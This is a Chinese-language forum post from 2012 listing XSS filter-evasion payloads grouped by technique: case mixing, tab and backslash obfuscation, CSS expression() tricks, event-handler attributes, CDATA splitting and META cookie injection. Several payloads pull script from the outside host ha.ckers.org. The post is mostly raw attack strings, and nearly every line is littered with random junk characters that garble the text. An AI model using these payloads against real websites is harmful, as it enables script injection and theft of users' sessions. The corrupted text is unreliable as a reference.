1. 改变字符大小写, l6 }4 b3 {0 p% ~
1 u/ Q3 D1 N9 ]' G. ^. V( ]
7 @) b1 B$ e# h
6 ^6 \6 k# b" T% B& N <sCript>alert(‘d’)</scRipT>5 ]- b1 c9 @. L t2 X. k# o4 C
% o/ E( P& n/ G( }
2. 利用多加一些其它字符来规避Regular Expression的检查2 S S( R+ X/ a' y. S T3 X
. i' Y+ m2 J; l+ @
<<script>alert(‘c’)//<</script>8 Q' u4 L8 l9 ~
4 S! z5 {, p- W, V8 C <SCRIPT a=">" SRC="t.js"></SCRIPT>
9 H# \% i3 G: Z) e/ E; k& R6 ?% U& B/ I4 k
<SCRIPT =">" SRC="t.js"></SCRIPT>8 g; g$ z6 A2 U% Q
$ F% e; u: | w, X0 a <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
5 A/ _ C( A% s& E7 x) Z% d: i; }( }$ G8 V
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>) z4 F+ a5 q; }7 O5 M
& ?6 J; q6 [4 H* ~5 L4 p <SCRIPT a=`>` SRC="t.js"></SCRIPT>& o% R) D0 ^% ^# u0 n
( l& F7 f {" i0 A$ p1 t/ Q" T" u <SCRIPT a=">’>" SRC="t.js"></SCRIPT>2 S" K- @/ z0 V' y
; H- @2 n. G, f2 N3. 以其它扩展名取代.js
1 O8 T! D2 w; h: l z8 t
5 I, l- J) \% j& w! M <script src="bad.jpg"></script>/ b. m; ~) @9 S4 M' W: L2 [2 p* i6 g
; N8 P2 O: F% s @3 v2 {: z3 m- c
4. 将Javascript写在CSS档里* o" q# J( r& ?; Y3 \5 I
7 i" F+ X* Y' w2 t <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
0 M2 `$ L# z" j4 @& c( E
' |6 u2 N5 N2 E% ~) f example:% p1 d3 w& f) P" e# l, y2 T
( r) W; m8 |* a5 V. ]- y
body {1 I: ]1 E, O ^
. j6 g. Y% z4 u. J2 i
background-image: url(‘javascript:alert("XSS");’)
" w) |8 ~6 ~& o$ _
9 v2 w- v0 S: Z' d& W7 {9 C }; d) c: M4 u4 f
6 m( Y3 o) ^+ o! ~8 n! E* U
5. 在script的tag里加入一些其它字符
, g: O. R6 f2 y. K0 F+ Z( |! p; Y' z- T* Z( G+ K6 z% ^
<SCRIPT/SRC="t.js"></SCRIPT>$ P' ~4 j1 r2 {6 v
; I9 }: B/ r$ q( Q# w; _ Q, c) b
<SCRIPT/anyword SRC="t.js"></SCRIPT>1 A1 t4 t/ G- u! S# o7 [ g7 g
* ]9 b1 y$ V, r7 d5 p
6. 使用tab或是new line来规避8 B8 V2 W1 x, o
3 R" \* i/ B# Q% _5 ~ <img src="jav ascr ipt:alert(‘XSS3′)">' O g% Y! T! h; t2 I
% K; H4 f6 K" i' m
<img src="jav ascr ipt:alert(‘XSS3′)">6 ]; d! b/ l* [
7 s1 a* ^, r7 R
<IMG SRC="jav ascript:alert(‘XSS’);">2 ~0 m# t% ^6 K9 \
( B) |5 q, o& R# X% I7 ~$ o9 o
-> tag, d' I) G; s! c
/ K7 V- [* u4 F: k, L
-> new line# Q4 ~, M: t! O
! Q% T' i5 G" N4 T7. 使用"\"来规避6 R* U/ Y' @, w4 ~
0 C$ j6 Y' O) K( Q. M5 S8 O; x/ L <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>- x* y8 Y5 M0 j) I% }/ z
4 i- k0 L5 g' o) B
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>& @' j M" T* {5 s
. s" [, | Q3 Z3 E5 g1 E/ ~
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">( A; O; p& F/ C* L0 X: z9 m7 P R. g
: ^0 a$ d/ |6 P' x( k9 Y1 D <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">4 O; r$ [9 [& L& P4 [, c
* w, u, c! D3 C6 ^
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
3 O9 P& \% y' Z. C. g7 z( ]* ]( {2 ^- o: n
8. 使用Hex encode来规避(也可能会把";"拿掉)
( X" x3 g6 G$ H
4 u. l5 B% Q1 T$ E) t$ v <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">. [0 b+ O7 g9 `; }! U
: e4 s# X( ~* T6 k6 f, u' ]
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));"> r) k; R6 Q% y/ S
+ X9 A+ @! Y7 n6 e! S, G <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">, g* q, \4 ~/ A) x# }& j7 w+ b
$ H% Y5 l; M) S- W# @
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
# v3 l5 O. E- N3 P- _
2 d7 r& k# v% S* R3 ]! \4 v9. script in HTML tag* s1 p' T5 R* r
% H! s3 ^: n: z- X; H
<body onload=」alert(‘onload’)」>
5 _; L' @7 R$ \- l9 ]" K
% ?: j4 C9 j% W5 E+ }. i$ V onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
7 f( T! @* W1 z" |4 l/ F# V0 s# V
/ Q1 r$ x- R+ F3 X10. 在swf里含有xss的code9 _" O- G' ^- G
2 S: g6 a+ L2 f s& x0 k2 X) F
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>! A8 r9 Q; B2 K& e h' [
3 g- ^0 ]. \: L5 u* N! b11. 利用CDATA将xss的code拆开,再组合起来。* }; w7 e( E/ E+ A: R% z1 r
4 u% g' q: s3 y# k9 x) N8 g <XML ID=I><X><C>
& C" o9 K- Y9 N& p. C1 Q" I; y/ r' l0 ?# n7 w& K1 |
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>" @( O" S9 ~+ e/ l9 }4 w
4 @/ s5 j4 J: | </C></X>
" x9 z1 {" ?$ }$ I$ t7 V3 t4 _4 a6 S. N6 @6 Q! r
</xml>) y. V; U9 E# a; Z0 g* K/ U4 x
, X+ U& ^9 o/ J8 I
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
: U/ d! G- q+ ?4 g% Y5 M* b' V. Q [! W/ w( K4 K3 |
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>, ^% y. J) z" `% v4 [
t- f! m3 i# @- x A, G <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>3 }1 `+ ]* Q1 z* e* u4 q7 H- B
( H" L, y: g7 m) t12. 利用HTML+TIME。
& L! K$ C8 l* Z6 D* U" X5 L" _7 n
<HTML><BODY>, ^3 g3 o# G0 W+ Y
2 u9 m6 w1 K- V! w& \ <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
6 ~+ _9 _- R; e6 k% l3 C
2 b ]1 V6 U0 X* h! n/ s6 q- T <?import namespace="t" implementation="#default#time2">4 c8 B6 A' t' u$ f3 r" j, O
R$ q; \, {( C$ b6 u7 J* C <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">2 c: R4 f" w# C" M4 P8 _
3 ^4 k% k' x T) K( x </BODY></HTML>7 [- p' t2 q; H Q) M; j' X C
" V/ a/ L( o& Y7 b: E" T9 o
13. 透过META写入Cookie。
, ]; L; X7 q5 A- O# F7 x# @! a& k/ f; s2 M* d9 ?+ Q6 W; r) C. F4 v
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
& H8 c% e+ n r& G+ x6 {$ E
" G. j: G; A, Q# \- Q6 [" x) D14. javascript in src , href , url) C9 g+ J7 V" q+ {) g* _5 K; k# i5 v
4 B9 T% b N: a
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
' X0 P" q4 T- X/ f" E L0 ?
$ |3 ?8 P2 e) _ <img src="javascript:alert(‘XSS3′)">
0 `% y2 s# `0 ~+ I
4 y5 X- ], g2 w: l<IMG DYNSRC="javascript:alert(‘XSS20′)">
; T* r/ K$ ?! G& T1 Z: g$ I6 u) y6 `2 Z* ]' P# Z
<IMG LOWSRC="javascript:alert(‘XSS21′)">
0 i% ]- G7 x8 w' q: w+ k' ?" q: d2 U5 _4 v6 T" l7 ^
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
7 {! p. G! I1 ^4 O; X+ e
' ~: o1 } X4 [2 c, Y <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>& n3 y+ ^4 k8 Q3 N
0 P4 M3 R, Q) N <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
, D$ t# K4 z: d* Y" ^3 ^5 I0 a/ q# Y4 y+ M( M
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
) i# E3 t3 Y( N* q
+ b+ r& R7 \% m/ i8 R <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
, k4 b! P$ X& P1 }" v
) \6 J3 m1 @4 `& M* F! A </STYLE><A CLASS=XSS></A>3 W2 B1 K& g2 w# S+ w" T
- ?+ ]* |2 J: A: r; h3 p <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET> x4 n/ A0 v2 X4 T' \1 C; N. ]
( i9 a1 }) K# F& y T2 g6 g
|
发表于 2012-12-31 09:59:28
收藏
支持
反对